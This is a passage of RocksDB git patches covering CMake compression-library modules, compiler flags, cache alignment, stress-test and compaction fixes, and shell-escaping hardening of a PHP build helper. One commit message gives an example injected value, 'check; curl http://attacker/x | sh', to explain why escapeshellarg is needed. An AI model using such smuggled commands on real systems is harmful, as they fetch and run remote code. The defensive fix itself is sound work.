REQUIRED) + add_definitions(-DLZ4) + include_directories(${LZ4_INCLUDE_DIR}) + list(APPEND THIRDPARTY_LIBS ${LZ4_LIBRARIES}) + endif() + + option(WITH_ZSTD "build with zstd" OFF) + if(WITH_ZSTD) + find_package(zstd REQUIRED) + add_definitions(-DZSTD) + include_directories(${ZSTD_INCLUDE_DIR}) + list(APPEND THIRDPARTY_LIBS ${ZSTD_LIBRARIES}) + endif() endif() if(WIN32) diff --git a/cmake/modules/Findbzip2.cmake b/cmake/modules/Findbzip2.cmake new file mode 100644 index 00000000000..87abbe941e0 --- /dev/null +++ b/cmake/modules/Findbzip2.cmake @@ -0,0 +1,21 @@ +# - Find Bzip2 +# Find the bzip2 compression library and includes +# +# BZIP2_INCLUDE_DIR - where to find bzlib.h, etc. +# BZIP2_LIBRARIES - List of libraries when using bzip2. +# BZIP2_FOUND - True if bzip2 found. + +find_path(BZIP2_INCLUDE_DIR + NAMES bzlib.h + HINTS ${BZIP2_ROOT_DIR}/include) + +find_library(BZIP2_LIBRARIES + NAMES bz2 + HINTS ${BZIP2_ROOT_DIR}/lib) + +include(FindPackageHandleStandardArgs) +find_package_handle_standard_args(bzip2 DEFAULT_MSG BZIP2_LIBRARIES BZIP2_INCLUDE_DIR) + +mark_as_advanced( + BZIP2_LIBRARIES + BZIP2_INCLUDE_DIR) diff --git a/cmake/modules/Findlz4.cmake b/cmake/modules/Findlz4.cmake new file mode 100644 index 00000000000..c34acef5e39 --- /dev/null +++ b/cmake/modules/Findlz4.cmake @@ -0,0 +1,21 @@ +# - Find Lz4 +# Find the lz4 compression library and includes +# +# LZ4_INCLUDE_DIR - where to find lz4.h, etc. +# LZ4_LIBRARIES - List of libraries when using lz4. +# LZ4_FOUND - True if lz4 found. 
+
+find_path(LZ4_INCLUDE_DIR
+  NAMES lz4.h
+  HINTS ${LZ4_ROOT_DIR}/include)
+
+find_library(LZ4_LIBRARIES
+  NAMES lz4
+  HINTS ${LZ4_ROOT_DIR}/lib)
+
+include(FindPackageHandleStandardArgs)
+find_package_handle_standard_args(lz4 DEFAULT_MSG LZ4_LIBRARIES LZ4_INCLUDE_DIR)
+
+mark_as_advanced(
+  LZ4_LIBRARIES
+  LZ4_INCLUDE_DIR)
diff --git a/cmake/modules/Findzlib.cmake b/cmake/modules/Findzlib.cmake
new file mode 100644
index 00000000000..fb5aee9b5aa
--- /dev/null
+++ b/cmake/modules/Findzlib.cmake
@@ -0,0 +1,21 @@
+# - Find zlib
+# Find the zlib compression library and includes
+#
+# ZLIB_INCLUDE_DIR - where to find zlib.h, etc.
+# ZLIB_LIBRARIES - List of libraries when using zlib.
+# ZLIB_FOUND - True if zlib found.
+
+find_path(ZLIB_INCLUDE_DIR
+  NAMES zlib.h
+  HINTS ${ZLIB_ROOT_DIR}/include)
+
+find_library(ZLIB_LIBRARIES
+  NAMES z
+  HINTS ${ZLIB_ROOT_DIR}/lib)
+
+include(FindPackageHandleStandardArgs)
+find_package_handle_standard_args(zlib DEFAULT_MSG ZLIB_LIBRARIES ZLIB_INCLUDE_DIR)
+
+mark_as_advanced(
+  ZLIB_LIBRARIES
+  ZLIB_INCLUDE_DIR)
diff --git a/cmake/modules/Findzstd.cmake b/cmake/modules/Findzstd.cmake
new file mode 100644
index 00000000000..a2964aa9f80
--- /dev/null
+++ b/cmake/modules/Findzstd.cmake
@@ -0,0 +1,21 @@
+# - Find zstd
+# Find the zstd compression library and includes
+#
+# ZSTD_INCLUDE_DIR - where to find zstd.h, etc.
+# ZSTD_LIBRARIES - List of libraries when using zstd.
+# ZSTD_FOUND - True if zstd found.
+
+find_path(ZSTD_INCLUDE_DIR
+  NAMES zstd.h
+  HINTS ${ZSTD_ROOT_DIR}/include)
+
+find_library(ZSTD_LIBRARIES
+  NAMES zstd
+  HINTS ${ZSTD_ROOT_DIR}/lib)
+
+include(FindPackageHandleStandardArgs)
+find_package_handle_standard_args(zstd DEFAULT_MSG ZSTD_LIBRARIES ZSTD_INCLUDE_DIR)
+
+mark_as_advanced(
+  ZSTD_LIBRARIES
+  ZSTD_INCLUDE_DIR)

From c5f0c6cc660f1f4a8051db2aac3b8afc17818e70 Mon Sep 17 00:00:00 2001
From: Nikhil Benesch
Date: Sun, 13 Aug 2017 21:30:15 -0700
Subject: [PATCH 109/205] compile with correct flags to determine SSE4.2 support

Summary:
With some compilers, `-std=c++11` is necessary for `<cstdint>` to be available. Pass this flag via $PLATFORM_CXXFLAGS. Fixes #2488.
Closes https://github.com/facebook/rocksdb/pull/2545

Differential Revision: D5620610

Pulled By: yiwu-arbug

fbshipit-source-id: 2f975b8c1ad52e283e677d9a33543abd064f13ce
---
 build_tools/build_detect_platform | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/build_tools/build_detect_platform b/build_tools/build_detect_platform
index d040f21f517..c7ddb7cceec 100755
--- a/build_tools/build_detect_platform
+++ b/build_tools/build_detect_platform
@@ -458,7 +458,7 @@ elif test -z "$PORTABLE"; then
   fi
 fi
 
-$CXX $COMMON_FLAGS -x c++ - -o /dev/null 2>/dev/null <<EOF
+$CXX $PLATFORM_CXXFLAGS $COMMON_FLAGS -x c++ - -o /dev/null 2>/dev/null <<EOF
   #include <cstdint>
  #include <nmmintrin.h>
  int main() {

From 279296f4d834d4cbdc35be28fca5b1eef71693a3 Mon Sep 17 00:00:00 2001
From: Nikhil Benesch
Date: Sun, 13 Aug 2017 21:46:05 -0700
Subject: [PATCH 110/205] properly set C[XX]FLAGS during CMake configure-time checks

Summary:
Some compilers require `-std=c++11` for the `cstdint` header to be available. We already have logic to add `-std=c++11` to `CXXFLAGS` when the compiler is not MSVC; simply reorder CMakeLists.txt so that logic happens before the calls to `CHECK_CXX_SOURCE_COMPILES`. Additionally add a missing `set(CMAKE_REQUIRED_FLAGS, ...)` before a call to `CHECK_C_SOURCE_COMPILES`.
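In other words, `CHECK_CXX_SOURCE_COMPILES` drives `try_compile` with whatever `CMAKE_CXX_FLAGS` and `CMAKE_REQUIRED_FLAGS` are in effect at the call site; if `-std=c++11` is appended only after the checks, every probe is compiled without it, and feature tests that need C++11 headers fail spuriously. Reordering the flag setup (and seeding `CMAKE_REQUIRED_FLAGS` from `CMAKE_C_FLAGS` for the C probe) lets the configure-time checks see the same flags as the real build.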
Closes https://github.com/facebook/rocksdb/pull/2535 Differential Revision: D5384244 Pulled By: yiwu-arbug fbshipit-source-id: 2dbae4297c5d8ab4636e08b1457ffb2d3e37aef4 --- CMakeLists.txt | 51 +++++++++++++++++++++++++------------------------- 1 file changed, 26 insertions(+), 25 deletions(-) diff --git a/CMakeLists.txt b/CMakeLists.txt index 36c9ff20e82..0a28a7c43ae 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -148,6 +148,31 @@ if(WIN32 AND MSVC) endif() endif() +set(BUILD_VERSION_CC ${CMAKE_BINARY_DIR}/build_version.cc) +configure_file(util/build_version.cc.in ${BUILD_VERSION_CC} @ONLY) +add_library(build_version OBJECT ${BUILD_VERSION_CC}) +target_include_directories(build_version PRIVATE + ${CMAKE_CURRENT_SOURCE_DIR}/util) +if(MSVC) + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /Zi /nologo /EHsc /GS /Gd /GR /GF /fp:precise /Zc:wchar_t /Zc:forScope /errorReport:queue") + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /FC /d2Zi+ /W3 /wd4127 /wd4800 /wd4996 /wd4351") +else() + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -W -Wextra -Wall") + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wsign-compare -Wshadow -Wno-unused-parameter -Wno-unused-variable -Woverloaded-virtual -Wnon-virtual-dtor -Wno-missing-field-initializers") + if(MINGW) + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wno-format") + endif() + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -std=c++11") + if(NOT CMAKE_BUILD_TYPE STREQUAL "Debug") + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -O2 -fno-omit-frame-pointer") + include(CheckCXXCompilerFlag) + CHECK_CXX_COMPILER_FLAG("-momit-leaf-frame-pointer" HAVE_OMIT_LEAF_FRAME_POINTER) + if(HAVE_OMIT_LEAF_FRAME_POINTER) + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -momit-leaf-frame-pointer") + endif() + endif() +endif() + option(PORTABLE "build a portable binary" OFF) option(FORCE_SSE42 "force building with SSE4.2, even when PORTABLE=ON" OFF) if(PORTABLE) @@ -191,31 +216,6 @@ if(HAVE_THREAD_LOCAL) add_definitions(-DROCKSDB_SUPPORT_THREAD_LOCAL) endif() -set(BUILD_VERSION_CC ${CMAKE_BINARY_DIR}/build_version.cc) -configure_file(util/build_version.cc.in ${BUILD_VERSION_CC} @ONLY) -add_library(build_version OBJECT ${BUILD_VERSION_CC}) -target_include_directories(build_version PRIVATE - ${CMAKE_CURRENT_SOURCE_DIR}/util) -if(MSVC) - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /Zi /nologo /EHsc /GS /Gd /GR /GF /fp:precise /Zc:wchar_t /Zc:forScope /errorReport:queue") - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /FC /d2Zi+ /W3 /wd4127 /wd4800 /wd4996 /wd4351") -else() - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -W -Wextra -Wall") - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wsign-compare -Wshadow -Wno-unused-parameter -Wno-unused-variable -Woverloaded-virtual -Wnon-virtual-dtor -Wno-missing-field-initializers") - if(MINGW) - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wno-format") - endif() - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -std=c++11") - if(NOT CMAKE_BUILD_TYPE STREQUAL "Debug") - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -O2 -fno-omit-frame-pointer") - include(CheckCXXCompilerFlag) - CHECK_CXX_COMPILER_FLAG("-momit-leaf-frame-pointer" HAVE_OMIT_LEAF_FRAME_POINTER) - if(HAVE_OMIT_LEAF_FRAME_POINTER) - set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -momit-leaf-frame-pointer") - endif() - endif() -endif() - option(FAIL_ON_WARNINGS "Treat compile warnings as errors" ON) if(FAIL_ON_WARNINGS) if(MSVC) @@ -325,6 +325,7 @@ endif() option(WITH_FALLOCATE "build with fallocate" ON) if(WITH_FALLOCATE) + set(CMAKE_REQUIRED_FLAGS ${CMAKE_C_FLAGS}) include(CheckCSourceCompiles) CHECK_C_SOURCE_COMPILES(" #include From 
ad42d2fcbbdd18640266ba3d76944a109d8f783b Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Wed, 9 Aug 2017 18:00:53 -0700 Subject: [PATCH 111/205] Remove residual arcanist_util directory --- arcanist_util/INTERNAL_ONLY_DIR | 2 -- 1 file changed, 2 deletions(-) delete mode 100644 arcanist_util/INTERNAL_ONLY_DIR diff --git a/arcanist_util/INTERNAL_ONLY_DIR b/arcanist_util/INTERNAL_ONLY_DIR deleted file mode 100644 index e55aa3bdfe3..00000000000 --- a/arcanist_util/INTERNAL_ONLY_DIR +++ /dev/null @@ -1,2 +0,0 @@ -arcanist_util are only used internaly, If you want to change it please check -/arcanist_util From e367774d19501a78c0699e6458d420c57ac73567 Mon Sep 17 00:00:00 2001 From: yiwu-arbug Date: Mon, 14 Aug 2017 14:28:33 -0700 Subject: [PATCH 112/205] Overload new[] to properly align LRUCacheShard Summary: Also verify it fixes gcc7 compile failure #2672 (see also #2699) Closes https://github.com/facebook/rocksdb/pull/2732 Differential Revision: D5620348 Pulled By: yiwu-arbug fbshipit-source-id: 87db657ab734f23b1bfaaa9db9b9956d10eaef59 --- Makefile | 13 ------------- cache/lru_cache.cc | 12 ++++++++++-- cache/lru_cache.h | 4 ++++ 3 files changed, 14 insertions(+), 15 deletions(-) diff --git a/Makefile b/Makefile index 9b80864fcd8..a657fad72b5 100644 --- a/Makefile +++ b/Makefile @@ -259,19 +259,6 @@ default: all WARNING_FLAGS = -W -Wextra -Wall -Wsign-compare -Wshadow \ -Wno-unused-parameter -CCVERSION = $(shell $(CXX) -dumpversion) -CCNAME = $(shell $(CXX) --version | awk 'NR==1' | cut -f1 -d " ") - -ifeq ($(CCNAME), clang) -ifeq ($(CCVERSION), 4*) - CXXFLAGS += -faligned-new -endif -else -ifeq ($(CCVERSION), 7) - CXXFLAGS += -faligned-new -endif -endif - ifndef DISABLE_WARNING_AS_ERROR WARNING_FLAGS += -Werror endif diff --git a/cache/lru_cache.cc b/cache/lru_cache.cc index f833374e73c..a78a52dffff 100644 --- a/cache/lru_cache.cc +++ b/cache/lru_cache.cc @@ -234,11 +234,19 @@ void LRUCacheShard::EvictFromLRU(size_t charge, } void* LRUCacheShard::operator new(size_t size) { - return rocksdb::port::cacheline_aligned_alloc(size); + return port::cacheline_aligned_alloc(size); +} + +void* LRUCacheShard::operator new[](size_t size) { + return port::cacheline_aligned_alloc(size); } void LRUCacheShard::operator delete(void *memblock) { - rocksdb::port::cacheline_aligned_free(memblock); + port::cacheline_aligned_free(memblock); +} + +void LRUCacheShard::operator delete[](void* memblock) { + port::cacheline_aligned_free(memblock); } void LRUCacheShard::SetCapacity(size_t capacity) { diff --git a/cache/lru_cache.h b/cache/lru_cache.h index 2fd44bbce50..abe78fd0c78 100644 --- a/cache/lru_cache.h +++ b/cache/lru_cache.h @@ -205,8 +205,12 @@ class ALIGN_AS(CACHE_LINE_SIZE) LRUCacheShard : public CacheShard { // Overloading to aligned it to cache line size void* operator new(size_t); + void* operator new[](size_t); + void operator delete(void *); + void operator delete[](void*); + private: void LRU_Remove(LRUHandle* e); void LRU_Insert(LRUHandle* e); From dfa6c23c4b6589479df998701368336f07e8912c Mon Sep 17 00:00:00 2001 From: Neal Poole Date: Tue, 15 Aug 2017 06:52:50 -0700 Subject: [PATCH 113/205] Update RocksDBCommonHelper to use escapeshellarg Summary: Most of the data used here in shell commands is not generated directly from user input but some data (ie: from environment variables) may have been external influenced. It is a good practice to escape this data before using it in a shell command. Originally D4800264 but we never quite got it merged. 
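To illustrate the class of bug this guards against (example value invented): if `$test` reached this code as `check; curl http://attacker/x | sh`, the unescaped concatenation `"./build_tools/precommit_checker.py " . $test` would let the shell execute the injected pipeline, whereas `escapeshellarg($test)` single-quotes the whole value so it arrives at the script as one inert argument.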
Reviewed By: yiwu-arbug Differential Revision: D5595052 fbshipit-source-id: c09d8b47fe35fc6a47afb4933ccad9d56ca8d7be --- build_tools/RocksDBCommonHelper.php | 50 ++++++++++++++++++----------- 1 file changed, 31 insertions(+), 19 deletions(-) diff --git a/build_tools/RocksDBCommonHelper.php b/build_tools/RocksDBCommonHelper.php index 41d1e21738f..9fe770fe956 100644 --- a/build_tools/RocksDBCommonHelper.php +++ b/build_tools/RocksDBCommonHelper.php @@ -21,11 +21,17 @@ function postURL($diffID, $url) { assert(is_numeric($diffID)); assert(strlen($url) > 0); - $cmd = 'echo \'{"diff_id": ' . $diffID . ', ' - . '"name":"click here for sandcastle tests for D' . $diffID . '", ' - . '"link":"' . $url . '"}\' | ' - . 'arc call-conduit ' - . 'differential.updateunitresults'; + $cmd_args = array( + 'diff_id' => (int)$diffID, + 'name' => sprintf( + 'click here for sandcastle tests for D%d', + (int)$diffID + ), + 'link' => $url + ); + $cmd = 'echo ' . escapeshellarg(json_encode($cmd_args)) + . ' | arc call-conduit differential.updateunitresults'; + shell_exec($cmd); } @@ -35,11 +41,15 @@ function buildUpdateTestStatusCmd($diffID, $test, $status) { assert(strlen($test) > 0); assert(strlen($status) > 0); - $cmd = 'echo \'{"diff_id": ' . $diffID . ', ' - . '"name":"' . $test . '", ' - . '"result":"' . $status . '"}\' | ' - . 'arc call-conduit ' - . 'differential.updateunitresults'; + $cmd_args = array( + 'diff_id' => (int)$diffID, + 'name' => $test, + 'result' => $status + ); + + $cmd = 'echo ' . escapeshellarg(json_encode($cmd_args)) + . ' | arc call-conduit differential.updateunitresults'; + return $cmd; } @@ -68,7 +78,7 @@ function getSteps($applyDiff, $diffID, $username, $test) { // and authenticate using that in Sandcastle. $setup = array( "name" => "Setup arcrc", - "shell" => "echo " . $arcrc_content . " | base64 --decode" + "shell" => "echo " . escapeshellarg($arcrc_content) . " | base64 --decode" . " | gzip -d > ~/.arcrc", "user" => "root" ); @@ -114,7 +124,7 @@ function getSteps($applyDiff, $diffID, $username, $test) { $patch = array( "name" => "Patch " . $diffID, "shell" => "arc --arcrc-file ~/.arcrc " - . "patch --nocommit --diff " . $diffID, + . "patch --nocommit --diff " . escapeshellarg($diffID), "user" => "root" ); @@ -125,8 +135,8 @@ function getSteps($applyDiff, $diffID, $username, $test) { } // Run the actual command. - $cmd = $cmd . "J=$(nproc) ./build_tools/precommit_checker.py " . $test - . "; exit_code=$?; "; + $cmd = $cmd . "J=$(nproc) ./build_tools/precommit_checker.py " . + escapeshellarg($test) . "; exit_code=$?; "; if ($applyDiff) { $cmd = $cmd . "([[ \$exit_code -eq 0 ]] &&" @@ -159,7 +169,7 @@ function getSteps($applyDiff, $diffID, $username, $test) { "name" => "Run " . $test, "shell" => $cmd, "user" => "root", - "parser" => "python build_tools/error_filter.py " . $test, + "parser" => "python build_tools/error_filter.py " . escapeshellarg($test), ); $steps[] = $run_test; @@ -207,7 +217,7 @@ function getSandcastleConfig() { if (file_exists(PRIMARY_TOKEN_FILE)) { $cmd = 'cat ' . PRIMARY_TOKEN_FILE; } else { - $cmd = 'cat ' . $cwd_token_file; + $cmd = 'cat ' . escapeshellarg($cwd_token_file); } assert(strlen($cmd) > 0); @@ -331,9 +341,11 @@ function startTestsInSandcastle($applyDiff, $workflow, $diffID) { $app = $sandcastle_config[0]; $token = $sandcastle_config[1]; - $cmd = 'curl -s -k -F app=' . $app . ' ' - . '-F token=' . $token . ' -F job=\'' . json_encode($job) - .'\' "' . $url . '"'; + $cmd = 'curl -s -k ' + . ' -F app=' . escapeshellarg($app) + . ' -F token=' . 
escapeshellarg($token)
+    . ' -F job=' . escapeshellarg(json_encode($job))
+    .' ' . escapeshellarg($url);
 
   $output = shell_exec($cmd);
   assert(strlen($output) > 0);

From 7aa96db7a20b0ca6e58f92e9b308324f25808aff Mon Sep 17 00:00:00 2001
From: Andrew Kryczka
Date: Tue, 15 Aug 2017 11:53:00 -0700
Subject: [PATCH 114/205] db_stress rolling active window

Summary:
Support a window of `active_width` keys that rolls through `[0, max_key)` over the duration of the test. Operations only affect keys inside the window. This gives us the ability to detect the L0->L0 deletion bug (#2722).
Closes https://github.com/facebook/rocksdb/pull/2739

Differential Revision: D5628555

Pulled By: ajkr

fbshipit-source-id: 9cb2d8f4ab1a7c73f7797b8e19f7094970ea8749
---
 tools/db_stress.cc | 19 ++++++++++++++++++-
 1 file changed, 18 insertions(+), 1 deletion(-)

diff --git a/tools/db_stress.cc b/tools/db_stress.cc
index db905f0c887..c7153f2e943 100644
--- a/tools/db_stress.cc
+++ b/tools/db_stress.cc
@@ -93,6 +93,13 @@ DEFINE_int64(max_key, 1 * KB* KB,
 
 DEFINE_int32(column_families, 10, "Number of column families");
 
+DEFINE_int64(
+    active_width, 0,
+    "Number of keys in active span of the key-range at any given time. The "
+    "span begins with its left endpoint at key 0, gradually moves rightwards, "
+    "and ends with its right endpoint at max_key. If set to 0, active_width "
+    "will be sanitized to be equal to max_key.");
+
 // TODO(noetzli) Add support for single deletes
 DEFINE_bool(test_batches_snapshots, false,
             "If set, the test uses MultiGet(), MultiPut() and MultiDelete()"
@@ -1727,7 +1734,11 @@ class StressTest {
     }
 #endif  // !ROCKSDB_LITE
 
-    long rand_key = thread->rand.Next() % max_key;
+    const double completed_ratio =
+        static_cast<double>(i) / FLAGS_ops_per_thread;
+    const int64_t base_key = static_cast<int64_t>(
+        completed_ratio * (FLAGS_max_key - FLAGS_active_width));
+    long rand_key = base_key + thread->rand.Next() % FLAGS_active_width;
     int rand_column_family = thread->rand.Next() % FLAGS_column_families;
     std::string keystr = Key(rand_key);
     Slice key = keystr;
@@ -2433,6 +2444,12 @@ int main(int argc, char** argv) {
             "test_batches_snapshots mode\n");
     exit(1);
   }
+  if (FLAGS_active_width > FLAGS_max_key) {
+    fprintf(stderr, "Error: active_width can be at most max_key\n");
+    exit(1);
+  } else if (FLAGS_active_width == 0) {
+    FLAGS_active_width = FLAGS_max_key;
+  }
 
   // Choose a location for the test database if none given with --db=
   if (FLAGS_db.empty()) {

From 3204a4f64bc718a3138d867e8083a2f71d01ec63 Mon Sep 17 00:00:00 2001
From: lxcode
Date: Tue, 15 Aug 2017 12:17:13 -0700
Subject: [PATCH 115/205] Fix missing stdlib include required for abort()

Summary:
If ROCKSDB_LITE is defined, a call to abort() is introduced. This call requires stdlib.h.
Build log of unpatched 5.7.1: http://beefy9.nyi.freebsd.org/data/110amd64-default/447974/logs/rocksdb-lite-5.7.1.log
Closes https://github.com/facebook/rocksdb/pull/2744

Reviewed By: yiwu-arbug

Differential Revision: D5632372

Pulled By: lxcode

fbshipit-source-id: b2a8e692bf14ccf1f875f3a00463e87bba310a2b
---
 include/rocksdb/filter_policy.h | 1 +
 1 file changed, 1 insertion(+)

diff --git a/include/rocksdb/filter_policy.h b/include/rocksdb/filter_policy.h
index 8c813d93e65..8add48e4963 100644
--- a/include/rocksdb/filter_policy.h
+++ b/include/rocksdb/filter_policy.h
@@ -22,6 +22,7 @@
 
 #include <memory>
 #include <stdexcept>
+#include <stdlib.h>
 #include <string>
 #include <vector>

From 71598cdc7518336b88c49ad8b1843f1c0b618d4e Mon Sep 17 00:00:00 2001
From: Siying Dong
Date: Tue, 15 Aug 2017 12:51:41 -0700
Subject: [PATCH 116/205] Fix false removal of tombstone issue in FIFO and kCompactionStyleNone

Summary:
Similar to the bug fixed by https://github.com/facebook/rocksdb/pull/2726, FIFO with compaction enabled, and kCompactionStyleNone during a user-customized CompactFiles() with output level set to 0, can suffer from the same problem. Fix it by leveraging the bottommost_level_ flag.
Closes https://github.com/facebook/rocksdb/pull/2735

Differential Revision: D5626906

Pulled By: siying

fbshipit-source-id: 2b148d0461c61dbd986d74655e384419ae442158
---
 db/compaction.cc | 44 ++++++++++++++++++++++----------------------
 db/db_test.cc    | 40 ++++++++++++++++++++++++++++++++++++++++
 2 files changed, 62 insertions(+), 22 deletions(-)

diff --git a/db/compaction.cc b/db/compaction.cc
index 9ea332da3fd..706eb3be031 100644
--- a/db/compaction.cc
+++ b/db/compaction.cc
@@ -284,32 +284,32 @@ bool Compaction::KeyNotExistsBeyondOutputLevel(
   assert(input_version_ != nullptr);
   assert(level_ptrs != nullptr);
   assert(level_ptrs->size() == static_cast<size_t>(number_levels_));
-  assert(cfd_->ioptions()->compaction_style != kCompactionStyleFIFO);
-  if (cfd_->ioptions()->compaction_style == kCompactionStyleUniversal) {
-    return bottommost_level_;
-  }
-  if (cfd_->ioptions()->compaction_style == kCompactionStyleLevel &&
-      output_level_ == 0) {
-    return false;
-  }
-  // Maybe use binary search to find right entry instead of linear search?
-  const Comparator* user_cmp = cfd_->user_comparator();
-  for (int lvl = output_level_ + 1; lvl < number_levels_; lvl++) {
-    const std::vector<FileMetaData*>& files = input_vstorage_->LevelFiles(lvl);
-    for (; level_ptrs->at(lvl) < files.size(); level_ptrs->at(lvl)++) {
-      auto* f = files[level_ptrs->at(lvl)];
-      if (user_cmp->Compare(user_key, f->largest.user_key()) <= 0) {
-        // We've advanced far enough
-        if (user_cmp->Compare(user_key, f->smallest.user_key()) >= 0) {
-          // Key falls in this file's range, so definitely
-          // exists beyond output level
-          return false;
+  if (cfd_->ioptions()->compaction_style == kCompactionStyleLevel) {
+    if (output_level_ == 0) {
+      return false;
+    }
+    // Maybe use binary search to find right entry instead of linear search?
+ const Comparator* user_cmp = cfd_->user_comparator(); + for (int lvl = output_level_ + 1; lvl < number_levels_; lvl++) { + const std::vector<FileMetaData*>& files = + input_vstorage_->LevelFiles(lvl); + for (; level_ptrs->at(lvl) < files.size(); level_ptrs->at(lvl)++) { + auto* f = files[level_ptrs->at(lvl)]; + if (user_cmp->Compare(user_key, f->largest.user_key()) <= 0) { + // We've advanced far enough + if (user_cmp->Compare(user_key, f->smallest.user_key()) >= 0) { + // Key falls in this file's range, so definitely + // exists beyond output level + return false; + } + break; + } - break; } } + return true; + } else { + return bottommost_level_; } - return true; } // Mark (or clear) each file that is being compacted diff --git a/db/db_test.cc b/db/db_test.cc index 675c403e5cc..fddb7aea6d0 100644 --- a/db/db_test.cc +++ b/db/db_test.cc @@ -2811,6 +2811,46 @@ TEST_F(DBTest, FIFOCompactionTestWithCompaction) { options.compaction_options_fifo.max_table_files_size); } +TEST_F(DBTest, FIFOCompactionStyleWithCompactionAndDelete) { + Options options; + options.compaction_style = kCompactionStyleFIFO; + options.write_buffer_size = 20 << 10; // 20K + options.arena_block_size = 4096; + options.compaction_options_fifo.max_table_files_size = 1500 << 10; // 1.5MB + options.compaction_options_fifo.allow_compaction = true; + options.level0_file_num_compaction_trigger = 3; + options.compression = kNoCompression; + options.create_if_missing = true; + options = CurrentOptions(options); + DestroyAndReopen(options); + + Random rnd(301); + for (int i = 0; i < 3; i++) { + // Each file contains a different key which will be dropped later. + ASSERT_OK(Put("a" + ToString(i), RandomString(&rnd, 500))); + ASSERT_OK(Put("key" + ToString(i), "")); + ASSERT_OK(Put("z" + ToString(i), RandomString(&rnd, 500))); + Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); + } + ASSERT_EQ(NumTableFilesAtLevel(0), 1); + for (int i = 0; i < 3; i++) { + ASSERT_EQ("", Get("key" + ToString(i))); + } + for (int i = 0; i < 3; i++) { + // Each file contains a different key which will be dropped later. + ASSERT_OK(Put("a" + ToString(i), RandomString(&rnd, 500))); + ASSERT_OK(Delete("key" + ToString(i))); + ASSERT_OK(Put("z" + ToString(i), RandomString(&rnd, 500))); + Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); + } + ASSERT_EQ(NumTableFilesAtLevel(0), 2); + for (int i = 0; i < 3; i++) { + ASSERT_EQ("NOT_FOUND", Get("key" + ToString(i))); + } +} + // Check that FIFO-with-TTL is not supported with max_open_files != -1. TEST_F(DBTest, FIFOCompactionWithTTLAndMaxOpenFilesTest) { Options options; From 132306fbf00b67a6a776dc4b4ebb8198c5a4f490 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Tue, 15 Aug 2017 14:54:41 -0700 Subject: [PATCH 117/205] Remove PartialMerge implementation from Cassandra merge operator Summary: `PartialMergeMulti` implementation is enough for Cassandra, and `PartialMerge` is not required. Implementing both will just duplicate the code. As per https://github.com/facebook/rocksdb/blob/master/include/rocksdb/merge_operator.h#L130-L135 : ``` // The default implementation of PartialMergeMulti will use this function // as a helper, for backward compatibility. Any successor class of // MergeOperator should either implement PartialMerge or PartialMergeMulti, // although implementing PartialMergeMulti is suggested as it is in general // more effective to merge multiple operands at a time instead of two // operands at a time.
``` Closes https://github.com/facebook/rocksdb/pull/2737 Reviewed By: scv119 Differential Revision: D5633073 Pulled By: sagar0 fbshipit-source-id: ef4fa102c22fec6a0175ed12f5c44c15afe3c8ca --- utilities/cassandra/merge_operator.cc | 21 --------------------- utilities/cassandra/merge_operator.h | 6 ------ 2 files changed, 27 deletions(-) diff --git a/utilities/cassandra/merge_operator.cc b/utilities/cassandra/merge_operator.cc index 3c9cb7f740b..715ef8586ab 100644 --- a/utilities/cassandra/merge_operator.cc +++ b/utilities/cassandra/merge_operator.cc @@ -47,27 +47,6 @@ bool CassandraValueMergeOperator::FullMergeV2( return true; } -// Implementation for the merge operation (merges two Cassandra values) -bool CassandraValueMergeOperator::PartialMerge(const Slice& key, - const Slice& left_operand, - const Slice& right_operand, - std::string* new_value, - Logger* logger) const { - // Clear the *new_value for writing. - assert(new_value); - new_value->clear(); - - std::vector<RowValue> row_values; - row_values.push_back(RowValue::Deserialize(left_operand.data(), - left_operand.size())); - row_values.push_back(RowValue::Deserialize(right_operand.data(), - right_operand.size())); - RowValue merged = RowValue::Merge(std::move(row_values)); - new_value->reserve(merged.Size()); - merged.Serialize(new_value); - return true; -} - bool CassandraValueMergeOperator::PartialMergeMulti( const Slice& key, const std::deque<Slice>& operand_list, diff --git a/utilities/cassandra/merge_operator.h b/utilities/cassandra/merge_operator.h index edbf120015f..679474075e5 100644 --- a/utilities/cassandra/merge_operator.h +++ b/utilities/cassandra/merge_operator.h @@ -20,12 +20,6 @@ class CassandraValueMergeOperator : public MergeOperator { virtual bool FullMergeV2(const MergeOperationInput& merge_in, MergeOperationOutput* merge_out) const override; - virtual bool PartialMerge(const Slice& key, - const Slice& left_operand, - const Slice& right_operand, - std::string* new_value, - Logger* logger) const override; - virtual bool PartialMergeMulti(const Slice& key, const std::deque<Slice>& operand_list, std::string* new_value, From eb6425303eb2474009a1a3a4857d7e49ccd19820 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Wed, 16 Aug 2017 16:49:11 -0700 Subject: [PATCH 118/205] Update WritePrepared with the pseudo code Summary: Implement the main body of the WritePrepared pseudo code. This includes PrepareInternal and CommitInternal, as well as AddCommitted, which updates the commit map. It also provides an IsInSnapshot method that could later be called from the read path to decide whether a version is in the read snapshot or should otherwise be skipped. This patch lacks unit tests and does not attempt to offer an efficient implementation. The idea is to have the API specified so that we can work on related tasks in parallel.
